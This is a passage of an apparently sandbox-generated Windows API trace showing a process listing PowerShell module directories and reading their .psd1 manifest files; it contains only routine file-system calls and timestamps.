nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0153.574] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d7f5920, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8d7f5920, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xdd1c5fc, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x29c5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataAdapter.ps1", cAlternateFileName="")) returned 1 [0153.574] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fb11da0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8fb11da0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xdd34cbd, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x6194, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psd1", cAlternateFileName="")) returned 1 [0153.574] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xdd34cbd, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x4f8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psm1", cAlternateFileName="")) returned 1 [0153.574] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9598a6c0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x9598a6c0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xde7c0cc, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0xc94a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsHelper.ps1", cAlternateFileName="")) returned 1 [0153.574] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d926420, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8d926420, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xded8da9, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x1ae6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 1 [0153.575] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d926420, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8d926420, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xded8da9, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x1ae6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 0 [0153.575] FindClose (in: hFindFile=0x5bfe4b8 | out: hFindFile=0x5bfe4b8) returned 1 [0153.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0153.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0153.575] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1")) returned 0x20 [0153.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0153.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0153.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0153.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0153.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0153.575] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), fInfoLevelId=0x0, lpFileInformation=0x276ff68 | out: lpFileInformation=0x276ff68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fb11da0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8fb11da0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0xdd34cbd, ftLastWriteTime.dwHighDateTime=0x1d21d41, nFileSizeHigh=0x0, nFileSizeLow=0x6194)) returned 1 [0153.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0153.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0153.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0153.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0153.576] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x520 [0153.576] GetFileType (hFile=0x520) returned 0x1 [0153.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0153.577] GetFileType (hFile=0x520) returned 0x1 [0153.577] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0153.577] ReadFile (in: hFile=0x520, lpBuffer=0x2770da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x2770da8*, lpNumberOfBytesRead=0x5a0e4c8*=0x1000, lpOverlapped=0x0) returned 1 [0153.620] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x1000 [0153.620] ReadFile (in: hFile=0x520, lpBuffer=0x2770da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x2770da8*, lpNumberOfBytesRead=0x5a0e4c8*=0x1000, lpOverlapped=0x0) returned 1 [0153.642] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x2000 [0153.642] ReadFile (in: hFile=0x520, lpBuffer=0x2770da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x2770da8*, lpNumberOfBytesRead=0x5a0e4c8*=0x1000, lpOverlapped=0x0) returned 1 [0153.643] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x3000 [0153.643] ReadFile (in: hFile=0x520, lpBuffer=0x2770da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x2770da8*, lpNumberOfBytesRead=0x5a0e4c8*=0x1000, lpOverlapped=0x0) returned 1 [0153.643] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x4000 [0153.643] ReadFile (in: hFile=0x520, lpBuffer=0x2770da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x2770da8*, lpNumberOfBytesRead=0x5a0e4c8*=0x1000, lpOverlapped=0x0) returned 1 [0153.644] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x5000 [0153.644] ReadFile (in: hFile=0x520, lpBuffer=0x2770da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x2770da8*, lpNumberOfBytesRead=0x5a0e4c8*=0x1000, lpOverlapped=0x0) returned 1 [0153.644] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x6000 [0153.644] ReadFile (in: hFile=0x520, lpBuffer=0x2770da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x2770da8*, lpNumberOfBytesRead=0x5a0e4c8*=0x194, lpOverlapped=0x0) returned 1 [0153.644] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x6194 [0153.644] ReadFile (in: hFile=0x520, lpBuffer=0x2770da8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x2770da8*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0153.645] CloseHandle (hObject=0x520) returned 1 [0153.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0153.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0153.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x51, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0153.654] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe4b8 [0153.654] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.654] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 1 [0153.654] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security.psd1", cAlternateFileName="")) returned 0 [0153.654] FindClose (in: hFindFile=0x5bfe4b8 | out: hFindFile=0x5bfe4b8) returned 1 [0153.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0153.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0153.654] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1")) returned 0x20 [0153.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x74 [0153.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x74, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0153.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x74 [0153.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x74, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0153.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0153.655] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2798028 | out: lpFileInformation=0x2798028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ef)) returned 1 [0153.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0153.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x74 [0153.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x74, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0153.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0153.656] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x520 [0153.656] GetFileType (hFile=0x520) returned 0x1 [0153.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0153.656] GetFileType (hFile=0x520) returned 0x1 [0153.656] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0153.656] ReadFile (in: hFile=0x520, lpBuffer=0x2798e60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x2798e60*, lpNumberOfBytesRead=0x5a0e4c8*=0x2ef, lpOverlapped=0x0) returned 1 [0153.680] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x2ef [0153.680] ReadFile (in: hFile=0x520, lpBuffer=0x2798e60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x2798e60*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0153.680] CloseHandle (hObject=0x520) returned 1 [0153.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0153.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0153.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x4e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0153.681] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe4b8 [0153.682] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.682] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f88a640, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8f88a640, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 1 [0153.682] FindNextFileW (in: hFindFile=0x5bfe4b8, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f88a640, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8f88a640, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 0 [0153.682] FindClose (in: hFindFile=0x5bfe4b8 | out: hFindFile=0x5bfe4b8) returned 1 [0153.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0153.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0153.682] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1")) returned 0x20 [0153.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x6e [0153.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x6e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", lpFilePart=0x0) returned 0x6d [0153.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x6e [0153.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x6e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", lpFilePart=0x0) returned 0x6d [0153.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0153.683] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x279f448 | out: lpFileInformation=0x279f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f88a640, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8f88a640, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x2ea)) returned 1 [0153.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0153.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x6e [0153.683] GetFullPathNameW (in: 